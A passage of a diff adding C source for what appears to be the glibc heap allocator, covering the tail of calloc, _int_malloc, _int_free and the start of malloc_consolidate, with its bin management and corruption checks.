+	    oldtopsize = (char *) heap + heap->mprotect_size - (char *) oldtop;
+	}
+#endif
+    }
+  else
+    {
+      /* No usable arenas.  */
+      oldtop = 0;
+      oldtopsize = 0;
+    }
+  mem = _int_malloc (av, sz);
+
+  assert (!mem || chunk_is_mmapped (mem2chunk (mem)) ||
+          av == arena_for_chunk (mem2chunk (mem)));
+
+  if (!SINGLE_THREAD_P)
+    {
+      if (mem == 0 && av != NULL)
+	{
+	  LIBC_PROBE (memory_calloc_retry, 1, sz);
+	  av = arena_get_retry (av, sz);
+	  mem = _int_malloc (av, sz);
+	}
+
+      if (av != NULL)
+	__libc_lock_unlock (av->mutex);
+    }
+
+  /* Allocation failed even after a retry.  */
+  if (mem == 0)
+    return 0;
+
+  p = mem2chunk (mem);
+
+  /* Two optional cases in which clearing not necessary */
+  if (chunk_is_mmapped (p))
+    {
+      if (__builtin_expect (perturb_byte, 0))
+        return memset (mem, 0, sz);
+
+      return mem;
+    }
+
+  csz = chunksize (p);
+
+#if MORECORE_CLEARS
+  if (perturb_byte == 0 && (p == oldtop && csz > oldtopsize))
+    {
+      /* clear only the bytes from non-freshly-sbrked memory */
+      csz = oldtopsize;
+    }
+#endif
+
+  /* Unroll clear of <= 36 bytes (72 if 8byte sizes).  We know that
+     contents have an odd number of INTERNAL_SIZE_T-sized words;
+     minimally 3.  */
+  d = (INTERNAL_SIZE_T *) mem;
+  clearsize = csz - SIZE_SZ;
+  nclears = clearsize / sizeof (INTERNAL_SIZE_T);
+  assert (nclears >= 3);
+
+  if (nclears > 9)
+    return memset (d, 0, clearsize);
+
+  else
+    {
+      *(d + 0) = 0;
+      *(d + 1) = 0;
+      *(d + 2) = 0;
+      if (nclears > 4)
+        {
+          *(d + 3) = 0;
+          *(d + 4) = 0;
+          if (nclears > 6)
+            {
+              *(d + 5) = 0;
+              *(d + 6) = 0;
+              if (nclears > 8)
+                {
+                  *(d + 7) = 0;
+                  *(d + 8) = 0;
+                }
+            }
+        }
+    }
+
+  return mem;
+}
+
+/*
+   ------------------------------ malloc ------------------------------
+ */
+
+static void *
+_int_malloc (mstate av, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;               /* normalized request size */
+  unsigned int idx;                 /* associated bin index */
+  mbinptr bin;                      /* associated bin */
+
+  mchunkptr victim;                 /* inspected/selected chunk */
+  INTERNAL_SIZE_T size;             /* its size */
+  int victim_index;                 /* its bin index */
+
+  mchunkptr remainder;              /* remainder from a split */
+  unsigned long remainder_size;     /* its size */
+
+  unsigned int block;               /* bit map traverser */
+  unsigned int bit;                 /* bit map traverser */
+  unsigned int map;                 /* current word of binmap */
+
+  mchunkptr fwd;                    /* misc temp for linking */
+  mchunkptr bck;                    /* misc temp for linking */
+
+#if USE_TCACHE
+  size_t tcache_unsorted_count;	    /* count of unsorted chunks processed */
+#endif
+
+  /*
+     Convert request size to internal form by adding SIZE_SZ bytes
+     overhead plus possibly more to obtain necessary alignment and/or
+     to obtain a size of at least MINSIZE, the smallest allocatable
+     size. Also, checked_request2size returns false for request sizes
+     that are so large that they wrap around zero when padded and
+     aligned.
+   */
+
+  if (!checked_request2size (bytes, &nb))
+    {
+      __set_errno (ENOMEM);
+      return NULL;
+    }
+
+  /* There are no usable arenas.  Fall back to sysmalloc to get a chunk from
+     mmap.  */
+  if (__glibc_unlikely (av == NULL))
+    {
+      void *p = sysmalloc (nb, av);
+      if (p != NULL)
+	alloc_perturb (p, bytes);
+      return p;
+    }
+
+  /*
+     If the size qualifies as a fastbin, first check corresponding bin.
+     This code is safe to execute even if av is not yet initialized, so we
+     can try it without checking, which saves some time on this fast path.
+   */
+
+#define REMOVE_FB(fb, victim, pp)			\
+  do							\
+    {							\
+      victim = pp;					\
+      if (victim == NULL)				\
+	break;						\
+    }							\
+  while ((pp = catomic_compare_and_exchange_val_acq (fb, victim->fd, victim)) \
+	 != victim);					\
+
+  if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ()))
+    {
+      idx = fastbin_index (nb);
+      mfastbinptr *fb = &fastbin (av, idx);
+      mchunkptr pp;
+      victim = *fb;
+
+      if (victim != NULL)
+	{
+	  if (SINGLE_THREAD_P)
+	    *fb = victim->fd;
+	  else
+	    REMOVE_FB (fb, pp, victim);
+	  if (__glibc_likely (victim != NULL))
+	    {
+	      size_t victim_idx = fastbin_index (chunksize (victim));
+	      if (__builtin_expect (victim_idx != idx, 0))
+		malloc_printerr ("malloc(): memory corruption (fast)");
+	      check_remalloced_chunk (av, victim, nb);
+#if USE_TCACHE
+	      /* While we're here, if we see other chunks of the same size,
+		 stash them in the tcache.  */
+	      size_t tc_idx = csize2tidx (nb);
+	      if (tcache && tc_idx < mp_.tcache_bins)
+		{
+		  mchunkptr tc_victim;
+
+		  /* While bin not empty and tcache not full, copy chunks.  */
+		  while (tcache->counts[tc_idx] < mp_.tcache_count
+			 && (tc_victim = *fb) != NULL)
+		    {
+		      if (SINGLE_THREAD_P)
+			*fb = tc_victim->fd;
+		      else
+			{
+			  REMOVE_FB (fb, pp, tc_victim);
+			  if (__glibc_unlikely (tc_victim == NULL))
+			    break;
+			}
+		      tcache_put (tc_victim, tc_idx);
+		    }
+		}
+#endif
+	      void *p = chunk2mem (victim);
+	      alloc_perturb (p, bytes);
+	      return p;
+	    }
+	}
+    }
+
+  /*
+     If a small request, check regular bin.  Since these "smallbins"
+     hold one size each, no searching within bins is necessary.
+     (For a large request, we need to wait until unsorted chunks are
+     processed to find best fit. But for small ones, fits are exact
+     anyway, so we can check now, which is faster.)
+   */
+
+  if (in_smallbin_range (nb))
+    {
+      idx = smallbin_index (nb);
+      bin = bin_at (av, idx);
+
+      if ((victim = last (bin)) != bin)
+        {
+          bck = victim->bk;
+	  if (__glibc_unlikely (bck->fd != victim))
+	    malloc_printerr ("malloc(): smallbin double linked list corrupted");
+          set_inuse_bit_at_offset (victim, nb);
+          bin->bk = bck;
+          bck->fd = bin;
+
+          if (av != &main_arena)
+	    set_non_main_arena (victim);
+          check_malloced_chunk (av, victim, nb);
+#if USE_TCACHE
+	  /* While we're here, if we see other chunks of the same size,
+	     stash them in the tcache.  */
+	  size_t tc_idx = csize2tidx (nb);
+	  if (tcache && tc_idx < mp_.tcache_bins)
+	    {
+	      mchunkptr tc_victim;
+
+	      /* While bin not empty and tcache not full, copy chunks over.  */
+	      while (tcache->counts[tc_idx] < mp_.tcache_count
+		     && (tc_victim = last (bin)) != bin)
+		{
+		  if (tc_victim != 0)
+		    {
+		      bck = tc_victim->bk;
+		      set_inuse_bit_at_offset (tc_victim, nb);
+		      if (av != &main_arena)
+			set_non_main_arena (tc_victim);
+		      bin->bk = bck;
+		      bck->fd = bin;
+
+		      tcache_put (tc_victim, tc_idx);
+	            }
+		}
+	    }
+#endif
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+
+  /*
+     If this is a large request, consolidate fastbins before continuing.
+     While it might look excessive to kill all fastbins before
+     even seeing if there is space available, this avoids
+     fragmentation problems normally associated with fastbins.
+     Also, in practice, programs tend to have runs of either small or
+     large requests, but less often mixtures, so consolidation is not
+     invoked all that often in most programs. And the programs that
+     it is called frequently in otherwise tend to fragment.
+   */
+
+  else
+    {
+      idx = largebin_index (nb);
+      if (atomic_load_relaxed (&av->have_fastchunks))
+        malloc_consolidate (av);
+    }
+
+  /*
+     Process recently freed or remaindered chunks, taking one only if
+     it is exact fit, or, if this a small request, the chunk is remainder from
+     the most recent non-exact fit.  Place other traversed chunks in
+     bins.  Note that this step is the only place in any routine where
+     chunks are placed in bins.
+
+     The outer loop here is needed because we might not realize until
+     near the end of malloc that we should have consolidated, so must
+     do so and retry. This happens at most once, and only when we would
+     otherwise need to expand memory to service a "small" request.
+   */
+
+#if USE_TCACHE
+  INTERNAL_SIZE_T tcache_nb = 0;
+  size_t tc_idx = csize2tidx (nb);
+  if (tcache && tc_idx < mp_.tcache_bins)
+    tcache_nb = nb;
+  int return_cached = 0;
+
+  tcache_unsorted_count = 0;
+#endif
+
+  for (;; )
+    {
+      int iters = 0;
+      while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
+        {
+          bck = victim->bk;
+          size = chunksize (victim);
+          mchunkptr next = chunk_at_offset (victim, size);
+
+          if (__glibc_unlikely (size <= 2 * SIZE_SZ)
+              || __glibc_unlikely (size > av->system_mem))
+            malloc_printerr ("malloc(): invalid size (unsorted)");
+          if (__glibc_unlikely (chunksize_nomask (next) < 2 * SIZE_SZ)
+              || __glibc_unlikely (chunksize_nomask (next) > av->system_mem))
+            malloc_printerr ("malloc(): invalid next size (unsorted)");
+          if (__glibc_unlikely ((prev_size (next) & ~(SIZE_BITS)) != size))
+            malloc_printerr ("malloc(): mismatching next->prev_size (unsorted)");
+          if (__glibc_unlikely (bck->fd != victim)
+              || __glibc_unlikely (victim->fd != unsorted_chunks (av)))
+            malloc_printerr ("malloc(): unsorted double linked list corrupted");
+          if (__glibc_unlikely (prev_inuse (next)))
+            malloc_printerr ("malloc(): invalid next->prev_inuse (unsorted)");
+
+          /*
+             If a small request, try to use last remainder if it is the
+             only chunk in unsorted bin.  This helps promote locality for
+             runs of consecutive small requests. This is the only
+             exception to best-fit, and applies only when there is
+             no exact fit for a small chunk.
+           */
+
+          if (in_smallbin_range (nb) &&
+              bck == unsorted_chunks (av) &&
+              victim == av->last_remainder &&
+              (unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+            {
+              /* split and reattach remainder */
+              remainder_size = size - nb;
+              remainder = chunk_at_offset (victim, nb);
+              unsorted_chunks (av)->bk = unsorted_chunks (av)->fd = remainder;
+              av->last_remainder = remainder;
+              remainder->bk = remainder->fd = unsorted_chunks (av);
+              if (!in_smallbin_range (remainder_size))
+                {
+                  remainder->fd_nextsize = NULL;
+                  remainder->bk_nextsize = NULL;
+                }
+
+              set_head (victim, nb | PREV_INUSE |
+                        (av != &main_arena ? NON_MAIN_ARENA : 0));
+              set_head (remainder, remainder_size | PREV_INUSE);
+              set_foot (remainder, remainder_size);
+
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+
+          /* remove from unsorted list */
+          if (__glibc_unlikely (bck->fd != victim))
+            malloc_printerr ("malloc(): corrupted unsorted chunks 3");
+          unsorted_chunks (av)->bk = bck;
+          bck->fd = unsorted_chunks (av);
+
+          /* Take now instead of binning if exact fit */
+
+          if (size == nb)
+            {
+              set_inuse_bit_at_offset (victim, size);
+              if (av != &main_arena)
+		set_non_main_arena (victim);
+#if USE_TCACHE
+	      /* Fill cache first, return to user only if cache fills.
+		 We may return one of these chunks later.  */
+	      if (tcache_nb
+		  && tcache->counts[tc_idx] < mp_.tcache_count)
+		{
+		  tcache_put (victim, tc_idx);
+		  return_cached = 1;
+		  continue;
+		}
+	      else
+		{
+#endif
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+#if USE_TCACHE
+		}
+#endif
+            }
+
+          /* place chunk in bin */
+
+          if (in_smallbin_range (size))
+            {
+              victim_index = smallbin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+            }
+          else
+            {
+              victim_index = largebin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+
+              /* maintain large bins in sorted order */
+              if (fwd != bck)
+                {
+                  /* Or with inuse bit to speed comparisons */
+                  size |= PREV_INUSE;
+                  /* if smaller than smallest, bypass loop below */
+                  assert (chunk_main_arena (bck->bk));
+                  if ((unsigned long) (size)
+		      < (unsigned long) chunksize_nomask (bck->bk))
+                    {
+                      fwd = bck;
+                      bck = bck->bk;
+
+                      victim->fd_nextsize = fwd->fd;
+                      victim->bk_nextsize = fwd->fd->bk_nextsize;
+                      fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
+                    }
+                  else
+                    {
+                      assert (chunk_main_arena (fwd));
+                      while ((unsigned long) size < chunksize_nomask (fwd))
+                        {
+                          fwd = fwd->fd_nextsize;
+			  assert (chunk_main_arena (fwd));
+                        }
+
+                      if ((unsigned long) size
+			  == (unsigned long) chunksize_nomask (fwd))
+                        /* Always insert in the second position.  */
+                        fwd = fwd->fd;
+                      else
+                        {
+                          victim->fd_nextsize = fwd;
+                          victim->bk_nextsize = fwd->bk_nextsize;
+                          if (__glibc_unlikely (fwd->bk_nextsize->fd_nextsize != fwd))
+                            malloc_printerr ("malloc(): largebin double linked list corrupted (nextsize)");
+                          fwd->bk_nextsize = victim;
+                          victim->bk_nextsize->fd_nextsize = victim;
+                        }
+                      bck = fwd->bk;
+                      if (bck->fd != fwd)
+                        malloc_printerr ("malloc(): largebin double linked list corrupted (bk)");
+                    }
+                }
+              else
+                victim->fd_nextsize = victim->bk_nextsize = victim;
+            }
+
+          mark_bin (av, victim_index);
+          victim->bk = bck;
+          victim->fd = fwd;
+          fwd->bk = victim;
+          bck->fd = victim;
+
+#if USE_TCACHE
+      /* If we've processed as many chunks as we're allowed while
+	 filling the cache, return one of the cached ones.  */
+      ++tcache_unsorted_count;
+      if (return_cached
+	  && mp_.tcache_unsorted_limit > 0
+	  && tcache_unsorted_count > mp_.tcache_unsorted_limit)
+	{
+	  return tcache_get (tc_idx);
+	}
+#endif
+
+#define MAX_ITERS       10000
+          if (++iters >= MAX_ITERS)
+            break;
+        }
+
+#if USE_TCACHE
+      /* If all the small chunks we found ended up cached, return one now.  */
+      if (return_cached)
+	{
+	  return tcache_get (tc_idx);
+	}
+#endif
+
+      /*
+         If a large request, scan through the chunks of current bin in
+         sorted order to find smallest that fits.  Use the skip list for this.
+       */
+
+      if (!in_smallbin_range (nb))
+        {
+          bin = bin_at (av, idx);
+
+          /* skip scan if empty or largest chunk is too small */
+          if ((victim = first (bin)) != bin
+	      && (unsigned long) chunksize_nomask (victim)
+	        >= (unsigned long) (nb))
+            {
+              victim = victim->bk_nextsize;
+              while (((unsigned long) (size = chunksize (victim)) <
+                      (unsigned long) (nb)))
+                victim = victim->bk_nextsize;
+
+              /* Avoid removing the first entry for a size so that the skip
+                 list does not have to be rerouted.  */
+              if (victim != last (bin)
+		  && chunksize_nomask (victim)
+		    == chunksize_nomask (victim->fd))
+                victim = victim->fd;
+
+              remainder_size = size - nb;
+              unlink_chunk (av, victim);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+		    set_non_main_arena (victim);
+                }
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+		  if (__glibc_unlikely (fwd->bk != bck))
+		    malloc_printerr ("malloc(): corrupted unsorted chunks");
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+      /*
+         Search for a chunk by scanning bins, starting with next largest
+         bin. This search is strictly by best-fit; i.e., the smallest
+         (with ties going to approximately the least recently used) chunk
+         that fits is selected.
+
+         The bitmap avoids needing to check that most blocks are nonempty.
+         The particular case of skipping all bins during warm-up phases
+         when no chunks have been returned yet is faster than it might look.
+       */
+
+      ++idx;
+      bin = bin_at (av, idx);
+      block = idx2block (idx);
+      map = av->binmap[block];
+      bit = idx2bit (idx);
+
+      for (;; )
+        {
+          /* Skip rest of block if there are no more set bits in this block.  */
+          if (bit > map || bit == 0)
+            {
+              do
+                {
+                  if (++block >= BINMAPSIZE) /* out of bins */
+                    goto use_top;
+                }
+              while ((map = av->binmap[block]) == 0);
+
+              bin = bin_at (av, (block << BINMAPSHIFT));
+              bit = 1;
+            }
+
+          /* Advance to bin with set bit. There must be one. */
+          while ((bit & map) == 0)
+            {
+              bin = next_bin (bin);
+              bit <<= 1;
+              assert (bit != 0);
+            }
+
+          /* Inspect the bin. It is likely to be non-empty */
+          victim = last (bin);
+
+          /*  If a false alarm (empty bin), clear the bit. */
+          if (victim == bin)
+            {
+              av->binmap[block] = map &= ~bit; /* Write through */
+              bin = next_bin (bin);
+              bit <<= 1;
+            }
+
+          else
+            {
+              size = chunksize (victim);
+
+              /*  We know the first chunk in this bin is big enough to use. */
+              assert ((unsigned long) (size) >= (unsigned long) (nb));
+
+              remainder_size = size - nb;
+
+              /* unlink */
+              unlink_chunk (av, victim);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+		    set_non_main_arena (victim);
+                }
+
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+		  if (__glibc_unlikely (fwd->bk != bck))
+		    malloc_printerr ("malloc(): corrupted unsorted chunks 2");
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+
+                  /* advertise as last remainder */
+                  if (in_smallbin_range (nb))
+                    av->last_remainder = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+    use_top:
+      /*
+         If large enough, split off the chunk bordering the end of memory
+         (held in av->top). Note that this is in accord with the best-fit
+         search rule.  In effect, av->top is treated as larger (and thus
+         less well fitting) than any other available chunk since it can
+         be extended to be as large as necessary (up to system
+         limitations).
+
+         We require that av->top always exists (i.e., has size >=
+         MINSIZE) after initialization, so if it would otherwise be
+         exhausted by current request, it is replenished. (The main
+         reason for ensuring it exists is that we may need MINSIZE space
+         to put in fenceposts in sysmalloc.)
+       */
+
+      victim = av->top;
+      size = chunksize (victim);
+
+      if (__glibc_unlikely (size > av->system_mem))
+        malloc_printerr ("malloc(): corrupted top size");
+
+      if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (victim, nb);
+          av->top = remainder;
+          set_head (victim, nb | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head (remainder, remainder_size | PREV_INUSE);
+
+          check_malloced_chunk (av, victim, nb);
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+
+      /* When we are using atomic ops to free fast chunks we can get
+         here for all block sizes.  */
+      else if (atomic_load_relaxed (&av->have_fastchunks))
+        {
+          malloc_consolidate (av);
+          /* restore original bin index */
+          if (in_smallbin_range (nb))
+            idx = smallbin_index (nb);
+          else
+            idx = largebin_index (nb);
+        }
+
+      /*
+         Otherwise, relay to handle system-dependent cases
+       */
+      else
+        {
+          void *p = sysmalloc (nb, av);
+          if (p != NULL)
+            alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+}
+
+/*
+   ------------------------------ free ------------------------------
+ */
+
+static void
+_int_free (mstate av, mchunkptr p, int have_lock)
+{
+  INTERNAL_SIZE_T size;        /* its size */
+  mfastbinptr *fb;             /* associated fastbin */
+  mchunkptr nextchunk;         /* next contiguous chunk */
+  INTERNAL_SIZE_T nextsize;    /* its size */
+  int nextinuse;               /* true if nextchunk is used */
+  INTERNAL_SIZE_T prevsize;    /* size of previous contiguous chunk */
+  mchunkptr bck;               /* misc temp for linking */
+  mchunkptr fwd;               /* misc temp for linking */
+
+  size = chunksize (p);
+
+  /* Little security check which won't hurt performance: the
+     allocator never wrapps around at the end of the address space.
+     Therefore we can exclude some size values which might appear
+     here by accident or by "design" from some intruder.  */
+  if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)
+      || __builtin_expect (misaligned_chunk (p), 0))
+    malloc_printerr ("free(): invalid pointer");
+  /* We know that each chunk is at least MINSIZE bytes in size or a
+     multiple of MALLOC_ALIGNMENT.  */
+  if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
+    malloc_printerr ("free(): invalid size");
+
+  check_inuse_chunk(av, p);
+
+#if USE_TCACHE
+  {
+    size_t tc_idx = csize2tidx (size);
+    if (tcache != NULL && tc_idx < mp_.tcache_bins)
+      {
+	/* Check to see if it's already in the tcache.  */
+	tcache_entry *e = (tcache_entry *) chunk2mem (p);
+
+	/* This test succeeds on double free.  However, we don't 100%
+	   trust it (it also matches random payload data at a 1 in
+	   2^<size_t> chance), so verify it's not an unlikely
+	   coincidence before aborting.  */
+	if (__glibc_unlikely (e->key == tcache))
+	  {
+	    tcache_entry *tmp;
+	    LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
+	    for (tmp = tcache->entries[tc_idx];
+		 tmp;
+		 tmp = tmp->next)
+	      if (tmp == e)
+		malloc_printerr ("free(): double free detected in tcache 2");
+	    /* If we get here, it was a coincidence.  We've wasted a
+	       few cycles, but don't abort.  */
+	  }
+
+	if (tcache->counts[tc_idx] < mp_.tcache_count)
+	  {
+	    tcache_put (p, tc_idx);
+	    return;
+	  }
+      }
+  }
+#endif
+
+  /*
+    If eligible, place chunk on a fastbin so it can be found
+    and used quickly in malloc.
+  */
+
+  if ((unsigned long)(size) <= (unsigned long)(get_max_fast ())
+
+#if TRIM_FASTBINS
+      /*
+	If TRIM_FASTBINS set, don't place chunks
+	bordering top into fastbins
+      */
+      && (chunk_at_offset(p, size) != av->top)
+#endif
+      ) {
+
+    if (__builtin_expect (chunksize_nomask (chunk_at_offset (p, size))
+			  <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (chunksize (chunk_at_offset (p, size))
+			     >= av->system_mem, 0))
+      {
+	bool fail = true;
+	/* We might not have a lock at this point and concurrent modifications
+	   of system_mem might result in a false positive.  Redo the test after
+	   getting the lock.  */
+	if (!have_lock)
+	  {
+	    __libc_lock_lock (av->mutex);
+	    fail = (chunksize_nomask (chunk_at_offset (p, size)) <= 2 * SIZE_SZ
+		    || chunksize (chunk_at_offset (p, size)) >= av->system_mem);
+	    __libc_lock_unlock (av->mutex);
+	  }
+
+	if (fail)
+	  malloc_printerr ("free(): invalid next size (fast)");
+      }
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    atomic_store_relaxed (&av->have_fastchunks, true);
+    unsigned int idx = fastbin_index(size);
+    fb = &fastbin (av, idx);
+
+    /* Atomically link P to its fastbin: P->FD = *FB; *FB = P;  */
+    mchunkptr old = *fb, old2;
+
+    if (SINGLE_THREAD_P)
+      {
+	/* Check that the top of the bin is not the record we are going to
+	   add (i.e., double free).  */
+	if (__builtin_expect (old == p, 0))
+	  malloc_printerr ("double free or corruption (fasttop)");
+	p->fd = old;
+	*fb = p;
+      }
+    else
+      do
+	{
+	  /* Check that the top of the bin is not the record we are going to
+	     add (i.e., double free).  */
+	  if (__builtin_expect (old == p, 0))
+	    malloc_printerr ("double free or corruption (fasttop)");
+	  p->fd = old2 = old;
+	}
+      while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2))
+	     != old2);
+
+    /* Check that size of fastbin chunk at the top is the same as
+       size of the chunk that we are adding.  We can dereference OLD
+       only if we have the lock, otherwise it might have already been
+       allocated again.  */
+    if (have_lock && old != NULL
+	&& __builtin_expect (fastbin_index (chunksize (old)) != idx, 0))
+      malloc_printerr ("invalid fastbin entry (free)");
+  }
+
+  /*
+    Consolidate other non-mmapped chunks as they arrive.
+  */
+
+  else if (!chunk_is_mmapped(p)) {
+
+    /* If we're single-threaded, don't lock the arena.  */
+    if (SINGLE_THREAD_P)
+      have_lock = true;
+
+    if (!have_lock)
+      __libc_lock_lock (av->mutex);
+
+    nextchunk = chunk_at_offset(p, size);
+
+    /* Lightweight tests: check whether the block is already the
+       top block.  */
+    if (__glibc_unlikely (p == av->top))
+      malloc_printerr ("double free or corruption (top)");
+    /* Or whether the next chunk is beyond the boundaries of the arena.  */
+    if (__builtin_expect (contiguous (av)
+			  && (char *) nextchunk
+			  >= ((char *) av->top + chunksize(av->top)), 0))
+	malloc_printerr ("double free or corruption (out)");
+    /* Or whether the block is actually not marked used.  */
+    if (__glibc_unlikely (!prev_inuse(nextchunk)))
+      malloc_printerr ("double free or corruption (!prev)");
+
+    nextsize = chunksize(nextchunk);
+    if (__builtin_expect (chunksize_nomask (nextchunk) <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (nextsize >= av->system_mem, 0))
+      malloc_printerr ("free(): invalid next size (normal)");
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    /* consolidate backward */
+    if (!prev_inuse(p)) {
+      prevsize = prev_size (p);
+      size += prevsize;
+      p = chunk_at_offset(p, -((long) prevsize));
+      if (__glibc_unlikely (chunksize(p) != prevsize))
+        malloc_printerr ("corrupted size vs. prev_size while consolidating");
+      unlink_chunk (av, p);
+    }
+
+    if (nextchunk != av->top) {
+      /* get and clear inuse bit */
+      nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+      /* consolidate forward */
+      if (!nextinuse) {
+	unlink_chunk (av, nextchunk);
+	size += nextsize;
+      } else
+	clear_inuse_bit_at_offset(nextchunk, 0);
+
+      /*
+	Place the chunk in unsorted chunk list. Chunks are
+	not placed into regular bins until after they have
+	been given one chance to be used in malloc.
+      */
+
+      bck = unsorted_chunks(av);
+      fwd = bck->fd;
+      if (__glibc_unlikely (fwd->bk != bck))
+	malloc_printerr ("free(): corrupted unsorted chunks");
+      p->fd = fwd;
+      p->bk = bck;
+      if (!in_smallbin_range(size))
+	{
+	  p->fd_nextsize = NULL;
+	  p->bk_nextsize = NULL;
+	}
+      bck->fd = p;
+      fwd->bk = p;
+
+      set_head(p, size | PREV_INUSE);
+      set_foot(p, size);
+
+      check_free_chunk(av, p);
+    }
+
+    /*
+      If the chunk borders the current high end of memory,
+      consolidate into top
+    */
+
+    else {
+      size += nextsize;
+      set_head(p, size | PREV_INUSE);
+      av->top = p;
+      check_chunk(av, p);
+    }
+
+    /*
+      If freeing a large space, consolidate possibly-surrounding
+      chunks. Then, if the total unused topmost memory exceeds trim
+      threshold, ask malloc_trim to reduce top.
+
+      Unless max_fast is 0, we don't know if there are fastbins
+      bordering top, so we cannot tell for sure whether threshold
+      has been reached unless fastbins are consolidated.  But we
+      don't want to consolidate on each free.  As a compromise,
+      consolidation is performed if FASTBIN_CONSOLIDATION_THRESHOLD
+      is reached.
+    */
+
+    if ((unsigned long)(size) >= FASTBIN_CONSOLIDATION_THRESHOLD) {
+      if (atomic_load_relaxed (&av->have_fastchunks))
+	malloc_consolidate(av);
+
+      if (av == &main_arena) {
+#ifndef MORECORE_CANNOT_TRIM
+	if ((unsigned long)(chunksize(av->top)) >=
+	    (unsigned long)(mp_.trim_threshold))
+	  systrim(mp_.top_pad, av);
+#endif
+      } else {
+	/* Always try heap_trim(), even if the top chunk is not
+	   large, because the corresponding heap might go away.  */
+	heap_info *heap = heap_for_ptr(top(av));
+
+	assert(heap->ar_ptr == av);
+	heap_trim(heap, mp_.top_pad);
+      }
+    }
+
+    if (!have_lock)
+      __libc_lock_unlock (av->mutex);
+  }
+  /*
+    If the chunk was allocated via mmap, release via munmap().
+  */
+
+  else {
+    munmap_chunk (p);
+  }
+}
+
+/*
+  ------------------------- malloc_consolidate -------------------------
+
+  malloc_consolidate is a specialized version of free() that tears
+  down chunks held in fastbins.  Free itself cannot be used for this
+  purpose since, among other things, it might place chunks back onto
+  fastbins.  So, instead, we need to use a minor variant of the same
+  code.
+*/
+
+static void malloc_consolidate(mstate av)
+{
+  mfastbinptr*    fb;                 /* current fastbin being consolidated */
+  mfastbinptr*    maxfb;              /* last fastbin (for loop control) */
+  mchunkptr       p;                  /* current chunk being consolidated */
+  mchunkptr       nextp;              /* next chunk to consolidate */
+  mchunkptr       unsorted_bin;       /* bin header */
+  mchunkptr       first_unsorted;     /* chunk to link to */
+
+  /* These have same use as in free() */
+  mchunkptr       nextchunk;
+  INTERNAL_SIZE_T size;
+  INTERNAL_SIZE_T nextsize;
+  INTERNAL_SIZE_T prevsize;
+  int             nextinuse;
+
+  atomic_store_relaxed (&av->have_fastchunks, false);
+
+  unsorted_bin = unsorted_chunks(av);
+
+  /*
+    Remove each chunk from fast bin and consolidate it, placing it
+    then in unsorted bin. Among other reasons for doing this,
+    placing in unsorted bin avoids needing to calculate actual bins
+    until malloc is sure that chunks aren't immediately going to be
+    reused anyway.
+  */
+
+  maxfb = &fastbin (av, NFASTBINS - 1);
+  fb = &fastbin (av, 0);
+  do {
+    p = atomic_exchange_acq (fb, NULL);
+    if (p != 0) {
+      do {
+	{
+	  unsigned int idx = fastbin_index (chunksize (p));
+	  if ((&fastbin (av, idx)) != fb)
+	    malloc_printerr ("malloc_consolidate(): invalid chunk size");
+	}
+
+	check_inuse_chunk(av, p);
+	nextp = p->fd;
+
+	/* Slightly streamlined version of consolidation code in free() */
+	size = chunksize (p);
+	nextchunk = chunk_at_offset(p, size);
+	nextsize = chunksize(nextchunk);
+
